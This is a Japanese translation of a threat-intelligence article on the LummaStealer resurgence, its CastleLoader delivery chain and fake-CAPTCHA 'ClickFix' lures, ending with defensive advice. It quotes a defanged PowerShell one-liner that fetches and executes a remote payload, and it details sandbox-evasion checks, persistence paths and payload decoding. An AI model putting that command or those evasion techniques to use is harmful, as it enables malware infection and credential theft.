昨年の大規模な法執行機関による摘発にもかかわらず、世界中でLummaStealer 感染が急増しています。
オペレーターは、Microsoftが2025年5月に2,300以上のC2ドメインを押収した後、迅速に再構築し、防弾ホストに移行し、RugmiやDonutLoaderなどのローダーをCastleLoaderに交換しました。
2025年12月から2026年1月のテレメトリーは、インド、米国、ヨーロッパをピークとする世界的な拡散を示しています。
ソーシャルエンジニアリングがほとんどの感染を引き起こしており、ゼロデイは不要です。被害者は「autocad 2008 keygen」などの偽のクラックソフトウェア、「Dark Souls full.exe」などのゲーム、または「avatar fire and ash 2025.mp4.exe」などの映画トレントからファイルを実行します。
これらは多くの場合、自己解凍アーカイブまたはNSISインストーラーを使用し、cmd.exeとextrac32を介して.cabファイルからCastleLoaderにチェーンします。
偽CAPTCHA「ClickFix」が急増しています。サイトはCloudflareチェックを模倣し、「&(gal wg*) -useb hxxp://45.221.64.224/12.d|iex」のようなエンコードされたPowerShellでクリップボードをハイジャックし、Win+Rペーストアンドランを促します。
これにより、ローダーが直接取得され、ダウンロードをバイパスします。Steam、Discord、またはitch.ioなどの正規プラットフォームが信頼性を獲得するためにおとりをホストしています。
脅威グループGrayBravoに関連するCastleLoaderは、回避のために実行可能ファイルにコンパイルされたAutoIt(またはPython)スクリプトを使用します。
難読化には、辞書変数(例:$COMMONLYOMAN)、XORキーを使用した16進文字列のデコード、無意味な数学のようなジャンク操作が含まれます。
サンドボックス回避:COMPUTERNAME=”tz”またはUSERNAME=”test22″をチェックし、「sfcphDaHojOHzEbBXPMIuBTaOH.sfcphDaHojOHzEbBXPMIuBTaOH」(DNS検索用の繰り返し文字列パターン)などの偽ドメインにpingし、vmtoolsd.exe/VboxTray.exe/SandboxieRpcSs.exeをスキャンするか、avastui.exeでスリープします。
永続化は適応します。Avast/Bitdefender/Sophosが実行されている場合は%LocalAppData%\CraftStitch Studios Inc\V.a3xまたはAutoIt3.exeにドロップし、StitchCraftX.lnkショートカットを作成し、DllCall CreateProcessWまたは直接書き込みを介してStartup .urlファイルを作成します。
ペイロードは、デュアルXORシェルコードを介して復号化され、LZNT1で解凍され、その後Lummaのようなmz/peを注入します。Lummaとのインフラストラクチャの重複は、共有プロバイダーを示唆しています。
VBAレイヤーはスケジュールされたタスクを追加します。wscript.exeがJSスクリプトを実行し、繰り返しのためにschtasks /sc minuteを設定します。
LummaはC2経由で流出します。電子メール(Gmail/Outlook)、VPN .ovpn、FTP、AnyDesk、KeePass、MetaMask/Binanceウォレット、およびプロファイリング用のシステム仕様。
攻撃を受けた場合は、認証情報(電子メール/金融が最優先)をローテーションし、セッションを破棄し、OSを再インストールしてください。組織:ClickFixについてトレーニングし、MFAを実施し、EDRを介してLOLBins(extrac32/cmd)、異常なDNS/プロセスを監視します。MaaSが進化するにつれて、行動ルールがシグネチャに勝ります。
Lummaの回復力は、MaaSエコシステムがユーザーの信頼の悪用によって繁栄していることを示しています。警戒を怠らないでください。
翻訳元: https://cyberpress.org/fake-captcha-fuels-lummastealer/